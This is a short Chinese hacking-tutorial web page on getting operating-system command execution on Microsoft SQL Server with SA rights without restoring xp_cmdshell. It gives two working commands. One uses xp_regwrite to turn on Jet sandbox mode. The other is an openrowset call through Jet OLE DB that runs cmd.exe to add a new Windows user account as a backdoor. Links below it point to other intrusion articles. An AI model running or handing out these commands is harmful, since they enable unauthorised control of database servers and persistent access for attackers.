SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令

所属分类: 网络编程 / 黑客相关 阅读数: 619
收藏 0 赞 0 分享
首先开启沙盘模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
更多精彩内容其他人还在看

防止电脑被他人控制

防止电脑被他人控制
收藏 0 赞 0 分享

最详细的SQL注入相关的命令整理 (转)第1/2页

这篇文章主要为打击分享下一些常用SQL注入相关的命令,今天帮客户做安装的时候发现他的网站有很多漏洞,导致注入数据库也被清空了,希望大家多关于安全
收藏 0 赞 0 分享

渗透中用openrowset搞shell的方法

渗透中用openrowset搞shell的方法
收藏 0 赞 0 分享

当网站不允许上传asp cer cdx htr文件时的一个解决方法!

当网站不允许上传asp cer cdx htr文件时的一个解决方法!
收藏 0 赞 0 分享

PHPSHELL又出新东东啦!

PHPSHELL又出新东东啦!
收藏 0 赞 0 分享

全面了解ASP注入方法 [收集总结]

全面了解ASP注入方法 [收集总结]
收藏 0 赞 0 分享

网站中的隐形WebEditor文件上传漏洞补丁

这篇文章主要介绍了网站中的隐形WebEditor文件上传漏洞补丁
收藏 0 赞 0 分享

新欢乐时光代码分析

新欢乐时光代码分析
收藏 0 赞 0 分享

Serv-U得到管理员密码新招 (转)

Serv-U得到管理员密码新招 (转)
收藏 0 赞 0 分享

NET IIS暴绝对路径漏洞

NET IIS暴绝对路径漏洞
收藏 0 赞 0 分享
查看更多